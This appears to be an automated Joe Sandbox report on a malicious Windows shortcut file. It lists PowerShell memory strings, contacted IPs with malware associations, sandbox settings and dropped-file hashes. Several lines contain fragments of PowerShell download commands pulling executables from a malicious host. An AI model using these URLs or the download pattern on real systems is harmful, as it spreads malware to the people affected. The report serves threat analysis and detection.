        https://badlarrysguitars.com/share/drp.exetrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1360669295.000002F19007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360669295.000002F1901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1337224669.000002F1819C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE0D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC8B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D7901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000003.00000002.1397020503.00000207CD332000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780C32000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.microsoft.copowershell.exe, 00000006.00000002.1647494860.000001D7FC960000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://crl.ver)svchost.exe, 0000000A.00000002.2572831859.00000203F2A00000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000A.00000003.1444813166.00000203F2920000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(powershell.exe, 00000012.00000002.2723434855.000001DAFA54F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2727333636.000001DAFA820000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2734761731.000001DAFC6F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2723434855.000001DAFA530000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2723434855.000001DAFA623000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2727025853.000001DAFA7E0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(powershell.exe, 00000006.00000002.1647699924.000001D7FCB31000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1634579286.000001D7FAA40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1637567333.000001D7FC7B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1635286137.000001D7FC2E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1631103048.000001D7FA7C0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://badlarrysguitars.com/share/drp.exe-OutFile(Join-Path(powershell.exe, 00000003.00000002.1389284394.00000207CA920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1391387666.00000207CA9A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1392944424.00000207CAC10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1394439368.00000207CC55C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547715754.00000207E4BCA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000000A.00000003.1444813166.00000203F2989000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://badlarrysguitars.compowershell.exe, 00000003.00000002.1397020503.00000207CDFE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://badlarrysguitars.compowershell.exe, 00000003.00000002.1397020503.00000207CE02A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781924000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://badlarrysguitars.com/share/drp.exeelpowershell.exe, 00000003.00000002.1391387666.00000207CA9A0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://contoso.com/powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1360669295.000002F19007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360669295.000002F1901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1337224669.000002F1819C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE0D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC8B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D7901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://oneget.orgXpowershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.1337224669.000002F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1337224669.000002F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://oneget.orgpowershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      3.219.243.226
                                      unknownUnited States
                                      14618AMAZON-AESUSfalse
                                      101.99.75.174
                                      badlarrysguitars.comMalaysia
                                      45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue
                                      IP
                                      127.0.0.1
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1570131
                                      Start date and time:2024-12-06 15:41:00 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 11s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:23
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:IFhqcKaIol.lnk
                                      renamed because original name is a hash value
                                      Original Sample Name:7d85db4c15db793280a65ddf0f1713e88f62f0eb87f00a4b4b6c3431eff4ccb9.lnk
                                      Detection:MAL
                                      Classification:mal80.winLNK@29/56@2/3
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 6
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .lnk
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 162.159.61.3, 172.64.41.3, 23.218.208.137, 199.232.214.172, 23.218.208.109, 23.195.39.65, 23.32.238.19, 23.32.238.48, 23.32.238.81, 2.19.198.202, 2.19.198.201, 23.32.238.74, 2.19.198.209, 23.32.238.83, 23.32.238.49, 2.20.40.170, 23.193.114.34, 23.193.114.8, 23.32.238.75, 23.32.238.80, 23.32.238.27, 23.32.239.56, 23.32.239.65, 23.32.239.9, 2.19.198.27
                                      • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                      • Execution Graph export aborted for target nthelper.exe, PID 7808 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 3400 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7600 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7820 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing network information.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: IFhqcKaIol.lnk
                                      TimeTypeDescription
                                      09:41:58API Interceptor113x Sleep call for process: powershell.exe modified
                                      09:42:09API Interceptor2x Sleep call for process: svchost.exe modified
                                      09:42:21API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                      09:43:38API Interceptor1336x Sleep call for process: conhost.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3.219.243.226SADP.zipGet hashmaliciousUnknownBrowse
                                        https://assets.website-files.com/65f01d0a723f74809a242153/66338b2a02c52612263308af_nuwezanusuxukejeselored.pdfGet hashmaliciousUnknownBrowse
                                          https://public-usa.mkt.dynamics.com/api/orgs/010a432a-e2a3-ef11-8a66-6045bd016f25/r/movKLLTpWUCqpRQQ2_8SfQEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fapp.seesaw.me%252Fpages%252Fshared_item%253Fitem_id%253Ditem.96abdfb3-93cb-482c-822f-f1d275a42e6e%2526share_token%253DDfLCj_YZQZedsrWVvLwerg%2526mode%253Dshare%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=kBeCY6h3I2oKWHussXexCqSpSk%2BEhyyLm0j2TqAuyLY%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                            Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                              Demande de proposition du Accueil-Parrainage Outaouais.pdfGet hashmaliciousUnknownBrowse
                                                Demande de proposition du Allesi Telecom.pdfGet hashmaliciousUnknownBrowse
                                                  Investec Payment-Copy.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdfGet hashmaliciousHTMLPhisherBrowse
                                                      NewAWOFM.pdfGet hashmaliciousUnknownBrowse
                                                        https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          bg.microsoft.map.fastly.net17334905466c073176eadfc4a4d1af620c5aa97d12d1156570ede93d276f9fa6d51fffb6c5778.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                          • 199.232.210.172
                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          1733479268d0423578683b481c87d2b90a74213612e8837faf7f066c8e81ec92f9b2658c65965.dat-decoded.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                          • 199.232.210.172
                                                          1733479274b6398afce8a86557af12b8f232b1cc4638f7df1d6de31554c2e013c23277a5b9785.dat-decoded.exeGet hashmaliciousPureCrypterBrowse
                                                          • 199.232.214.172
                                                          mjf2ERXdI5.exeGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          16547.jsGet hashmaliciousMassLogger RATBrowse
                                                          • 199.232.214.172
                                                          Scan_03774843.pdfGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          dtkB4s3lqj.lnkGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                          • 199.232.214.172
                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                          • 199.232.210.172
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYScan_03774843.pdfGet hashmaliciousUnknownBrowse
                                                          • 101.99.77.51
                                                          https://oyatsu-jikan.org/#Z2FyeXRocm93JG5hdGlvbmFsdHViZXN1cHBseS5jb20=Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                          • 101.99.88.67
                                                          442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                          • 111.90.147.125
                                                          442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                          • 111.90.147.125
                                                          442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                          • 111.90.147.125
                                                          442.docx.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                          • 111.90.147.125
                                                          Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                          • 101.99.75.104
                                                          http://amz-account-unlock-dashboard4.duckdns.orgGet hashmaliciousUnknownBrowse
                                                          • 111.90.149.151
                                                          https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                          • 111.90.141.53
                                                          Ssc Executed Docs#962297(Revised).docxGet hashmaliciousUnknownBrowse
                                                          • 111.90.146.230
                                                          AMAZON-AESUSjew.sh4.elfGet hashmaliciousUnknownBrowse
                                                          • 44.221.131.20
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 44.196.3.45
                                                          jew.mips.elfGet hashmaliciousUnknownBrowse
                                                          • 54.42.218.193
                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                          • 44.196.3.45
                                                          https://us-api.mimecast.com.kb4.io/XWko4Q0hGOG85d2pSNGFBUW1UaEJSL09QUThzR2hrYWl3UGh4aEFVNkQ0dW1jU0FrdnhwRFB2clh1VmRINlRhSTJXNkM0N2NiS0J6WWlVRENjUVlPSWZYbk9xUkNaRDNGSjR3OU1Jd2RSdlJKL0k2cjZWV0ozK1BLRWRrZWJucElFUGVXcFpkM2hlOXluYlErY01WYkRnNmtzUldXNlJEcmIvN0Z0WVNMOHNobW5lMjVGcEdENDA0TWZNblZTWFVuRUp3PS0taC91cHJQRm5XdmFVejBTdC0tWVNTU2ZrYnF5clZ0ZndVU0tiNHIzUT09?cid=2313358952Get hashmaliciousKnowBe4Browse
                                                          • 54.85.18.81
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 34.224.200.202
                                                          https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.pngGet hashmaliciousHTMLPhisherBrowse
                                                          • 54.224.154.88
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 44.196.3.45
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 34.224.200.202
                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                          • 50.16.47.176
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eJSWunwO4rS.lnkGet hashmaliciousLummaC StealerBrowse
                                                          • 101.99.75.174
                                                          7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                          • 101.99.75.174
                                                          kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                          • 101.99.75.174
                                                          https://t.ly/alBFXGet hashmaliciousUnknownBrowse
                                                          • 101.99.75.174
                                                          QD40FIJ8QK.lnkGet hashmaliciousUnknownBrowse
                                                          • 101.99.75.174
                                                          TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 101.99.75.174
                                                          AS6xKJzYJT.exeGet hashmaliciousPython Stealer, XenoRATBrowse
                                                          • 101.99.75.174
                                                          yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                          • 101.99.75.174
                                                          5eAjHgPxj2.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                          • 101.99.75.174
                                                          No context
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.8008467419853399
                                                          Encrypted:false
                                                          SSDEEP:1536:CJD1YBdWK7S50AhnZ0Ag0ALzJVEbJBJlPVPEH3cNkPfF7Njg9QaQfOgFrGXuE5Tq:CJC5rk0X+MbJ72D4qgfiaDhvO7VMBf9
                                                          MD5:B677498EE2D48FDCA0861A17AEDD018D
                                                          SHA1:4EBEDB294CECA7E131846D26228309595C6B8E3B
                                                          SHA-256:E99B76A478063D88D50B23293FF94F7F69F331FFD27DF3E042AFA1E4F6A2B90B
                                                          SHA-512:4D59FC92DFF9831CDEB91F09850226F4EC9C38C94BFC97750231F7CFA38E7260540C92207A51BEECB39D5602BB3312E47FD8815ED537D1CC3D2E86CEA3419A5B
                                                          Malicious:false
                                                          Preview:dg".........@..@%9...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................T.....#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7ff9b58d, page size 16384, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.7716205728831352
                                                          Encrypted:false
                                                          SSDEEP:1536:rSB2ESB2SSjlK/7vqlC06Z546I50AEzJ+Ykr3g16XWq2UPkLk+kFLKho38o38+W6:raza9vqcHbrq2UyUVWlW
                                                          MD5:F092BD386EC29ED6ECBC106F26589AED
                                                          SHA1:7B374E3CAF6CB815339B0228768F29AEEE8A63C4
                                                          SHA-256:8DA4A4C8BABA8EBD7B491F53C1A07AE37CB30B3575DCF3AFDA24F1014D762E6C
                                                          SHA-512:0F023F0D2EC639C26992806BA1405B39FFA8F55CDE22E167D5BF0D9E6C122CE4FB06B432235A35EA5360585FF42C5ABC3251E41D2E24C89C91BA62E5B44B3C0F
                                                          Malicious:false
                                                          Preview:....... ...............X\...;...{......................0.p.....#....{...*...|..h.r.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......%9...{...............................................................................................................................................................................................2...{................................... .).*...|..................F>.Z.*...|...........................#......h.r.....................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.08149016519002025
                                                          Encrypted:false
                                                          SSDEEP:3:TyKYebx+reu8qrrvr+gvrr/wArXlallVmctlll/Sm1l1:+Kzborogn/wArXALPPv
                                                          MD5:CF6E4AF55769890E9DD606C3F87DDA08
                                                          SHA1:0DA58213BE9E053AEBD913CBFA18BD1AD73B4172
                                                          SHA-256:B84FDFCD3B63104D3A9418453769E5B056D3679A56C51DDF17B3BAA5B8F8B88A
                                                          SHA-512:91D502F9EAE85F2CACB64DE16F05518CD6F47EAA6C2767E5A3B975B73CAD1FCA0F398CCCB990E05A1679A3297452B0B125BEB82A05CABAB809B90315D4977632
                                                          Malicious:false
                                                          Preview:#.......................................;...{...*...|..#....{..........#....{..#....{...i..#....{.V................F>.Z.*...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):292
                                                          Entropy (8bit):5.123077995143631
                                                          Encrypted:false
                                                          SSDEEP:6:FdUq2PsZ2nKuAl9OmbnIFUt8cdDZmw+cdZkwOsZ2nKuAl9OmbjLJ:FdUvkcHAahFUt8cdD/+cdZ51cHAaSJ
                                                          MD5:2AC0B532D8F4B181EC015AF79B527FF7
                                                          SHA1:4980D2723B9F2F21A00B7D26A607015ACEA66D29
                                                          SHA-256:EA5268F35A66A099B2D3AADA7BF2425C17372DFDE5E360E4F65A5F03F776B416
                                                          SHA-512:AEF4B38704468509EA454F10F23783A5C5C195719BCFEE20C5A9C817E9228632BC9DAE063AA71B75D01F433F89752609305384D9B5E9FB6C28974561F69A1474
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:09.440 1940 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:42:09.446 1940 Recovering log #3.2024/12/06-09:42:09.446 1940 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):292
                                                          Entropy (8bit):5.123077995143631
                                                          Encrypted:false
                                                          SSDEEP:6:FdUq2PsZ2nKuAl9OmbnIFUt8cdDZmw+cdZkwOsZ2nKuAl9OmbjLJ:FdUvkcHAahFUt8cdD/+cdZ51cHAaSJ
                                                          MD5:2AC0B532D8F4B181EC015AF79B527FF7
                                                          SHA1:4980D2723B9F2F21A00B7D26A607015ACEA66D29
                                                          SHA-256:EA5268F35A66A099B2D3AADA7BF2425C17372DFDE5E360E4F65A5F03F776B416
                                                          SHA-512:AEF4B38704468509EA454F10F23783A5C5C195719BCFEE20C5A9C817E9228632BC9DAE063AA71B75D01F433F89752609305384D9B5E9FB6C28974561F69A1474
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:09.440 1940 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:42:09.446 1940 Recovering log #3.2024/12/06-09:42:09.446 1940 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):336
                                                          Entropy (8bit):5.223002221081224
                                                          Encrypted:false
                                                          SSDEEP:6:FxMq2PsZ2nKuAl9Ombzo2jMGIFUt8cmWZZmw+ct+kwOsZ2nKuAl9Ombzo2jMmLJ:FevkcHAa8uFUt8cmy/+cE51cHAa8RJ
                                                          MD5:D983C08055F59835DBECFB80E8D4E352
                                                          SHA1:34376E4431953747618D6388B338AF05D70C034D
                                                          SHA-256:B186A8F62942FEBD2E815CAB4086ED1D462352BB84F5C2D85B98278641D7391C
                                                          SHA-512:DF863C40FC6205467299BF568A72C01B692BD29A04395E2F796CE37AE74A59ECB84EF3AAE490D11B6FFD06CB1C7B42C5860FB90924EA266DB1CF5D1269CDE013
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:09.583 1744 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:42:09.585 1744 Recovering log #3.2024/12/06-09:42:09.586 1744 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):336
                                                          Entropy (8bit):5.223002221081224
                                                          Encrypted:false
                                                          SSDEEP:6:FxMq2PsZ2nKuAl9Ombzo2jMGIFUt8cmWZZmw+ct+kwOsZ2nKuAl9Ombzo2jMmLJ:FevkcHAa8uFUt8cmy/+cE51cHAa8RJ
                                                          MD5:D983C08055F59835DBECFB80E8D4E352
                                                          SHA1:34376E4431953747618D6388B338AF05D70C034D
                                                          SHA-256:B186A8F62942FEBD2E815CAB4086ED1D462352BB84F5C2D85B98278641D7391C
                                                          SHA-512:DF863C40FC6205467299BF568A72C01B692BD29A04395E2F796CE37AE74A59ECB84EF3AAE490D11B6FFD06CB1C7B42C5860FB90924EA266DB1CF5D1269CDE013
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:09.583 1744 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:42:09.585 1744 Recovering log #3.2024/12/06-09:42:09.586 1744 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):476
                                                          Entropy (8bit):4.971308936549284
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sq1sBdOg2HCcaq3QYiubPyP7E4TX:Y2sRdsTdMHN3QYhbC7n7
                                                          MD5:9DED1C09A5BF5786A6517CEEA68DC0C7
                                                          SHA1:F3213474F6BB0938812FFECD151F8FC6726CCBAC
                                                          SHA-256:F15AF223B9643822E857CBCCAC24A50F65AF34313C6964B7F81ACFBAE218FA3E
                                                          SHA-512:7E0ADC5AD0DFF2996E6D09E8C8124A1A8D043582DD37861A100D1BB066033F3E0E46AA85A16A418C065E36938E04BB62EE6729946311CF4099BB786035BF7A35
                                                          Malicious:false
